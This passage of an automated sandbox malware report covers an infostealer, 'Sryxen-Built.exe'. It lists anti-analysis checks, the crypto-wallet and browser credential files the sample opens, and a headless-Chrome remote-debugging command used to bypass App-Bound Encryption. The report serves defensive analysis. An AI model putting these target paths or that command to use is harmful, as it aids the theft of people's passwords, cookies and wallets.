Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7650
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1427
Source: C:\Users\user\Desktop\Sryxen-Built.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-91268
Source: C:\Users\user\Desktop\Sryxen-Built.exe TID: 7340Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3116Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8836Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\Sryxen-Built.exeCode function: 0_2_00007FF6F65789AC FindClose,FindFirstFileExW,GetLastError,0_2_00007FF6F65789AC
Source: C:\Users\user\Desktop\Sryxen-Built.exeCode function: 0_2_00007FF6F6578A8C GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,CloseHandle,CloseHandle,0_2_00007FF6F6578A8C
Source: C:\Users\user\Desktop\Sryxen-Built.exeCode function: 0_2_00007FF6F65385D0 GetSystemInfo,0_2_00007FF6F65385D0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\Sryxen-Built.exeFile opened: C:\Users\user\AppData\Local\Packages\Microsoft.WebpImageExtension_8wekyb3d8bbwe\SystemAppData\Jump to behavior
Source: C:\Users\user\Desktop\Sryxen-Built.exeFile opened: C:\Users\user\AppData\Local\Packages\Microsoft.WebpImageExtension_8wekyb3d8bbwe\AppData\Jump to behavior
Source: C:\Users\user\Desktop\Sryxen-Built.exeFile opened: C:\Users\user\AppData\Local\Publishers\8wekyb3d8bbwe\Microsoft.WindowsAlarms\Jump to behavior
Source: C:\Users\user\Desktop\Sryxen-Built.exeFile opened: C:\Users\user\AppData\Local\Packages\Microsoft.WebpImageExtension_8wekyb3d8bbwe\RoamingState\Jump to behavior
Source: C:\Users\user\Desktop\Sryxen-Built.exeFile opened: C:\Users\user\AppData\Local\Publishers\8wekyb3d8bbwe\SettingsContainer\Jump to behavior
Source: C:\Users\user\Desktop\Sryxen-Built.exeFile opened: C:\Users\user\AppData\Local\Packages\Microsoft.WebpImageExtension_8wekyb3d8bbwe\LocalCache\Jump to behavior
Source: Sryxen-Built.exe, 00000000.00000002.1675272620.00000273000C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW\UP
Source: Sryxen-Built.exe, 00000000.00000002.1676255001.00000273002AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: Sryxen-Built.exe, 00000000.00000003.1318964444.00000273000C4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1323702315.00000273000CB000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1323031792.00000273000C5000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1322632976.00000273000C4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1325728345.00000273000C4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1319835500.00000273000C6000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1326015138.00000273000C6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW\U%SystemRoot%\system32\mswsock.dll
Source: curl.exe, 00000009.00000002.1440413944.00000243B3798000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\Sryxen-Built.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\Sryxen-Built.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\Sryxen-Built.exeCode function: 0_2_00007FF6F657F5B0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6F657F5B0
Source: C:\Users\user\Desktop\Sryxen-Built.exeCode function: 0_2_00007FF6F63C4870 LoadLibraryW,GetProcAddress,NtQueryInformationProcess,ReadProcessMemory,0_2_00007FF6F63C4870
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Users\user\Desktop\Sryxen-Built.exeCode function: 0_2_00007FF6F657F5B0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6F657F5B0

HIPS / PFW / Operating System Protection Evasion

barindex
Found direct / indirect Syscall (likely to bypass EDR)
Source: C:\Users\user\Desktop\Sryxen-Built.exeNtQueryInformationProcess: Indirect: 0x7FF6F63C491AJump to behavior
Maps a DLL or memory area into another process
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeSection loaded: NULL target: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe protection: readonlyJump to behavior
Source: C:\Users\user\Desktop\Sryxen-Built.exeCode function: GetLocaleInfoEx,FormatMessageA,0_2_00007FF6F6576FA0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\Desktop\Sryxen-Built.exeCode function: 0_2_00007FF6F657585C GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF6F657585C
Source: C:\Users\user\Desktop\Sryxen-Built.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information

barindex
Found many strings related to Crypto-Wallets (likely being stolen)
Source: Sryxen-Built.exe, 00000000.00000002.1675272620.00000273000B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: Sryxen-Built.exe, 00000000.00000003.1328557057.00000273000F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxx Liberty
Source: Sryxen-Built.exe, 00000000.00000002.1675272620.00000273000B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: Sryxen-Built.exe, 00000000.00000002.1675272620.00000273000B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum\keystore
Source: Sryxen-Built.exe, 00000000.00000003.1328557057.00000273000F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3
Source: Sryxen-Built.exe, 00000000.00000002.1675272620.00000273000B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum\keystore
Source: Sryxen-Built.exe, 00000000.00000002.1675272620.00000273000B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: Sryxen-Built.exe, 00000000.00000002.1675272620.00000273000B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum\keystore
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\Sryxen-Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
Source: C:\Users\user\Desktop\Sryxen-Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
Source: C:\Users\user\Desktop\Sryxen-Built.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
Source: C:\Users\user\Desktop\Sryxen-Built.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
Source: C:\Users\user\Desktop\Sryxen-Built.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
Source: C:\Users\user\Desktop\Sryxen-Built.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
Source: C:\Users\user\Desktop\Sryxen-Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior

Remote Access Functionality

barindex
Attempt to bypass Chrome Application-Bound Encryption
Source: C:\Users\user\Desktop\Sryxen-Built.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --remote-debugging-port=25424 --remote-allow-origins=* --disable-extensions --no-sandbox --disable-gpu

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Native API		1
Registry Run Keys / Startup Folder		11
Process Injection		1
Masquerading		1
OS Credential Dumping		1
System Time Discovery		Remote Services1
Archive Collected Data		21
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
DLL Side-Loading		1
Abuse Elevation Control Mechanism		31
Virtualization/Sandbox Evasion		LSASS Memory21
Security Software Discovery		Remote Desktop Protocol2
Data from Local System		1
Remote Access Software		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
Registry Run Keys / Startup Folder		11
Process Injection		Security Account Manager31
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive2
Ingress Tool Transfer		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
DLL Side-Loading		1
Deobfuscate/Decode Files or Information		NTDS2
Process Discovery		Distributed Component Object ModelInput Capture3
Non-Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Abuse Elevation Control Mechanism		LSA Secrets1
Application Window Discovery		SSHKeylogging4
Application Layer Protocol		Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Obfuscated Files or Information		Cached Domain Credentials2
File and Directory Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
DLL Side-Loading		DCSync24
System Information Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
